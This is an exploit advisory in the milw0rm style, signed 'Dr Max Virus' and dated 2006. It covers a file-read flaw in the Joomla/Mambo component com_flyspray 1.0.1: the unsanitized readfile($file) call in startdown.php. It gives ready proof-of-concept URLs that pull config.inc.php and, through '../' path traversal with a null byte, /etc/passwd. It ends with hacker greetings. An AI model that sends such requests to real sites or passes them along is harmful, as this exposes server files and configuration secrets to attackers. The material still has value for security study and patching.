_____ __ __ __ ___
| __ \ | \/ | \ \ / (_)
| | | |_ __ | \ / | __ ___ __ \ \ / / _ _ __ _ _ ___
| | | | '__| | |\/| |/ _` \ \/ / \ \/ / | | '__| | | / __|
| |__| | | | | | | (_| |> < \ / | | | | |_| \__ \
|_____/|_| |_| |_|\__,_/_/\_\ \/ |_|_| \__,_|___/
*****************************************************************************************************************************
Compononent name:com_flyspray
Affected Version:1.0.1
d.page:http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip
*****************************************************************************************************************************
Authour: Dr Max Virus
Location:Egypt
*****************************************************************************************************************************
Bug in :startdown.php
Vul Code:
In Line 52:
readfile($file);
Problem:The variable of file not sanitized So u can read any file on server
and also config file
*****************************************************************************************************************************
POC:
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
*****************************************************************************************************************************
Thx To:str0ke & Nukedx & Thehacker & All My Friends
Special Gr33Ts:ASIANEAGLE & The Master &Kacper
****************************************************************************************************************************
# milw0rm.com [2006-11-26]